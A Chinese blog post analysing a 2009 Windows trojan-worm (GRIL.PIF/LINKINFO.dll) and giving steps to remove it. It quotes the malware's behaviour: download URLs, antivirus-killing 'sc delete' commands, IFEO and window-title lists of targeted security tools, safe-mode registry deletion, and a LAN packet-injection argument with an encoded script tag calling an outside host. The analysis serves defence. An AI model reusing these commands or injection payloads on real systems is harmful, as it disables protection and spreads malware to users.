被挂马的病毒分析

这病毒很不简单,比之07年横行的AV终结者有过之而无不及。一般中这病毒只有等死了(截断一切的防护措施),甚至下载的恶意程序还使用了Rootkit技术....

分析如下:

木马连接的下载地址hxxp://a.wuc9.com/ab.css,改为EXE后为可执行

文件名称:GRIL.PIF\ab.css(exe)

文件大小:30208 bytes

病毒命名:

Kaspersky 7.0.0.125 2009.04.19 Worm.Win32.AutoRun.fpb
BitDefender 7.2 2009.04.18 Genrojan.Heur.1024456363
Symantec 1.4.4.12 2009.04.19 Trojan.KillAV

加壳方式:PE_Patch.UPX

文件MD5:cbda45b0fd2a779dddbd8a4807a6be6c

行为:

1、启动时查找互斥体“AS21a669aSSE”,有则退出进程,防止多个病毒体被运行

2、释放文件:

C:\WINDOWS\Fonts\svchost.exe 11776 字节
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节
C:\WINDOWS\system32\36osafe.exe, 13531 字节
C:\WINDOWS\system32\isb.ini = 141 字节 (病毒下载列表)
C:\WINDOWS\system32\LINKINFO.dll(主体)

3、调用cmd /c sc delete avp命令,删除卡巴斯基服务

4、连接网络: [url]http://a.wuc9.com/tt.txt[/url] 保存至C:\WINDOWS\system32\isb.ini,下载其他流氓程序!

5、修改IFEO,启动重定向劫持,屏蔽常见的安全工具

360rpt.EXE
360safe.EXE
360safebox.EXE
360tray.EXE
ANTIARP.EXE
ArSwp.EXE
Ast.EXE
AutoRun.EXE
AutoRunKiller.EXE
AvMonitor.EXE
AVP.COM
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
GFUpd.EXE
GuardField.EXE
HijackThis.EXE
IceSword.EXE
Iparmor.EXE
KASARP.EXE
kav32.EXE
KAVPFW.EXE
kavstart.EXE
kissvc.EXE
kmailmon.EXE
KPfwSvc.EXE
KRegEx.EXE
KVMonxp.KXP
KVSrvXP.EXE
KVWSC.EXE
kwatch.EXE
Mmsk.EXE
Navapsvc.EXE
nod32krn.EXE
Nod32kui.EXE
PFW.EXE
QQDoctor.EXE
RAV.EXE
RavMon.EXE
RavMonD.EXE
Ravservice.EXE
RavStub.EXE
RavTask.EXE
RAVTRAY.EXE
Regedit.EXE
rfwmain.EXE
rfwProxy.EXE
rfwsrv.EXE
Rfwstub.EXE
RsAgent.EXE
Rsaupd.EXE
RsMain.EXE
rsnetsvr.EXE
RSTray.EXE
Runiep.EXE
safeboxTray.EXE
ScanFrm.EXE
SREngLdr.EXE
TrojanDetector.EXE
Trojanwall.EXE
TrojDie.KXP
VPC32.EXE
VPTRAY.EXE
WOPTILITIES.EXE

5、查找窗口,发现以下文字则会被关闭:

essact
egui
RavTray
ccApp
vptray
KavStart
360Safebox
360Safetray
AfxControlBar42s
IceSword
SYSTEM
杀毒   
清理
SREng
超级巡警
金山
Anti
Mcafee
狙剑
主动防御
微点
绿鹰
主动
上报
举报
瑞星
NOD32
拦截
监控
安全卫士
监视

冰刃的关闭方式是向退出时的确认框发送“是”消息,关闭冰刃

6、查找可用的磁盘,在目录下拷贝病毒为autorun.inf和GRIL.PIF

并每隔一段时间查找可用磁盘,完成移动盘感染

所以重做系统,如果不及时删除磁盘下的病毒副本,那么病毒会死灰复燃!!!

7、时隔5秒为周期,以递增方式访问192.168.0.1至192.168.0.100IP段,应该是局域传播

由于测试局限性,该行为未实现。

8、调用CMD,删除服务:

cmd.exe /c sc delete ekrn
cmd.exe /c sc delete RsRavMon
cmd.exe /c sc delete RavTask
cmd.exe /c sc delete RsScanSrv
cmd.exe /c sc delete RavCCenter

重启后诺顿和瑞星报销

9、还有这些服务也会被禁用:

Norton AntiVirus Server
McAfee Framework
Symantec AntiVirus Definition Watcher
Symantec AntiVirus Drivers Services
Norton AntiVirus
norton AntiVirus server
Kingsoft Internet Security Common Service

10、启动另一个线程:C:\WINDOWS\system32\36osafe.exe(注意是36O不是360)

在192.168.203.2-192.168.203.254的数据包内加入一个框架,参数为:

-idx 0 -ip 192.168.203.2-192.168.203.254 -port 80 -insert "<script language=javascript src=hxxp://%33%36%30%2E%63%64%64%31%2E%63%6F%6D/lg.js></script>"
完成局域感染

解密后hxxp://360.cdd1.com/lg.js

相继连接以下站点:

hxxp://371gw.com/pai/ll.htm
hxxp://371gw.com/pai/4.htm
hxxp://371gw.com/pai/1.js
hxxp://371gw.com/pai/all.js
hxxp://371gw.com/pai/1.htm
hxxp://371gw.com/pai/ie.swf
hxxp://371gw.com/pai/all.htm
hxxp://371gw.com/pai/ll.htm

跟上次挂的马基本一样,猜臆为同一网马生成器

均为crypthtml和unescape、shellcode混合加密

还是Real,Flash,Ms0614等漏洞

最后下载的病毒跟这个一样!

11、删除以下注册表键值破坏安全模式:

SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

12、修改注册表

SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall

使隐藏文件不显示,保护病毒文件

简单的解决方法:

1、下载SREng,删除启动:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <360safe><C:\WINDOWS\Fonts\wuauclt.exe> []

SREng能检测到的所有IFEO键值

[lfdl / lfdl][Stopped/Manual Start]
<\??\C:\WINDOWS\fonts\lfdl.sys><N/A>

[nbkkt / nbkkt][Stopped/Manual Start]
<\??\C:\WINDOWS\Fonts\nbkkt.fon><N/A>

[acpidisk / acpidisk][Running/Auto Start]
<\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>

pnpmem驱动

2、重启计算机,删除文件:

C:\WINDOWS\Fonts\svchost.exe 11776 字节
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节
C:\WINDOWS\system32\36osafe.exe, 13531 字节
C:\WINDOWS\system32\LINKINFO.dll

3、全部删除后解决,电脑可正常使用!







你可能感兴趣的:(职场,休闲,GRIL.PIF,ab.css,LINKINFO.dll)